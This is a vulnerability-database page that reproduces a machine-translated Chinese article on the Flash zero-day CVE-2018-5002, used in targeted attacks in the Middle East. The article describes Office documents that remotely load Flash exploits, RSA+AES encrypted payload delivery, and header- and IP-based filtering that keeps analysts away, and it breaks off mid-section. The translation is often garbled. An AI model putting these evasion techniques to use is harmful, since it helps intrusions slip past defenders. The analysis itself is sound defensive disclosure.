Lucene search

K
myhack58佚名MYHACK58:62201890504
HistoryJun 21, 2018 - 12:00 a.m.

FLASH zero-day Vulnerability CVE-2018-5002 in the Middle East directed network attacks exploit-vulnerability warning-the black bar safety net

2018-06-2100:00:00
佚名
www.myhack58.com
306

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.028 Low

EPSS

Percentile

89.5%

! [](/Article/UploadPic/2018-6/2018621151215316. jpg? www. myhack58. com)
Recently, ICEBRG security research team (SRT) identified Adobe Flash 0 day Vulnerability CVE-2018-5002-directional network attack behavior, the 0-day vulnerability is an attacker for the Middle East region, important individuals and organizations of network penetration. An attacker use the vulnerability to construct a malicious Flash object, you can target the victims on the computer implementation of the code, to achieve the subsequent permeation of a series of Payload and malicious code running.
This article will such an attack the details of the disclosure, including technical analysis, for the Qatar of targeted attacks, as well as some defensive measures suggestions. We hope that the publication of these findings, contribute to industry and individuals wary of the vulnerability of similar cyber attacks in a timely manner to the security guard. For the vulnerability, we have to 2018 6 January 1, 4:14 AM PDT to Adobe for the first packet, in the fastest time, Adobe and our ICEBRG security team coordinated to resolve and reproduce the entire vulnerability, after the 2018 year 6 on 7 January Adobe released the vulnerability patch.
Attack review
We found that, this time CVE-2018-5002 vulnerability attacks, which target the victims on the computer implementation of the use of the code is by Microsoft Office to achieve the download is performed, the entire exploit process is shown in the following figure, first, when the targeted victim clicks the attacker to embed a malicious object in a Microsoft Office document after download execute a remote Shockwave Flash (SWF)file. Unlike most Flash use code powered by Microsoft Office embedded mode of transmission, here a Microsoft Office document using a few well-known functions that come from the attacker to the schema of the server-side to load all the SWF content.
The first stage of the SWF propagation process involves a RSA+AES encryption system, it can protect the subsequent as the actual exploit using code SWF download implementation and distribution. Such as RSA asymmetric encryption applications can circumvent some of the traditional, reproduction-type security device, and to prevent ex-post network data packet capture and analysis; the second stage of the SWF distribution, when the target victim system to perform a Microsoft Office document is clicked the trigger, it will use the previous encryption mode to go from attacker to server remote download perform contains Backdoor functionality and the subsequent use of the tool shellcode code, and ultimately to the target computer system intrusion control. Typically, the final attack Payload contains a series of threatening the core of the shellcode code, we have tried to go to recovery to extract the final Payload, but for other reasons, and finally did not succeed.
! [](/Article/UploadPic/2018-6/2018621151216649. png? www. myhack58. com)
Remote FLASH contains
Since many browsers disable the Flash function, so the attack is from the Microsoft Office internal load Adobe Flash Player and play, this is a very popular method. But on the other side, the attack also have different. Generally speaking, the attacker will be in the document to embed the entire as exploit the use of the Code of the Flash file, or initiate a selective exploit or payload of the download operation, such as APT28/Sofacy DealersChoice, etc., for the security and Defense left by The may be labeled or is backtracking to identify the Flash loader file.
With these typical attacks use different, this attack is not directly embedded in Flash, but using a less known feature to the remote contains Flash content, as shown below, the final combined effect is, you’ll see Select the Flash Player ActiveX control XML wrapper and a reference to the OLE object:
! [](/Article/UploadPic/2018-6/2018621151216229. png? www. myhack58. com)
On the figure of the Flash object, containing a“Movie”property, and in the“Movie”attribute in the define a remote Flach address of the object, this is purely an initial object contains application examples. This remote loading of an embedded Flash object have a plurality of significant advantages:
Free to killand to circumvent the resistance: first, from the Microsoft Office document itself, does not contain any malicious code. Static detection, the best check way is to analyze the remote contains Flash content. Dynamic detection, the need for the defense of the sandbox/simulator must be with the attacker’s server malicious content of the received interaction, which requires the analysis of the system with the Internet real-time connection. Moreover, the attacker may be based on requesting IP address or the HTTP header, to selectively service to the next stage of penetration. Once on the target system to establish the access path, the attacker could disable their C2 server, then the attack analysis can only rely on some legacy acts evidence.
Target targeted: since the attacker can selectively to victims system provides vulnerability attacks exploit code, they can will attack the restrictions in the targeted victims of the system. For example, the attacker can through the regional ISP of the target company or personal network included in the white list, the cloud infrastructure and the security of the company included in the blacklist, thereby restricting to specific IP addresses access. HTTP header“Accept-Language” and “User-Agent”, also can be used for the known victims of the venue system environment included in the white list, or the abnormal or incorrect response to security products included in the blacklist. HTTP header sort, contains, or is missing usually also possible to distinguish between security products, the real victim and the orientation of the target. Finally, the“x-flash-version” can be used to contain victims of the system version of Flash Player, the attacker in the service end according to the version of choose the most effective exploit code to conduct attacks.
Even if the attacker this static way of existing occupied space is small, but in the Microsoft Office document loading process, the remote Flash objects in Microsoft Office documents to extract the execution.
The encryption mechanism
The attack is successful, from the server to the client of the data communication by the following figure using the AES symmetric algorithm is a custom encryption mechanism to confuse, such AES and RSA utilized in combination, so that the Payload data and the symmetric key can obtain the encryption protection. And its a custom encryption mechanism is the use of a common ActionScript script library to perform some low level operation.
! [](/Article/UploadPic/2018-6/2018621151216302. png? www. myhack58. com)
The client first sends a service terminal initiates a data communication request, in this process, the client through the HTTP POST method, the server sends a randomly generated RSA modulus n and public exponent e=0×10001, i.e., the public key n, e, after services end for the encrypted format data response:
0×0: the Encrypted AES key length (L)

[1] [2] [3] next

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.028 Low

EPSS

Percentile

89.5%

Related for MYHACK58:62201890504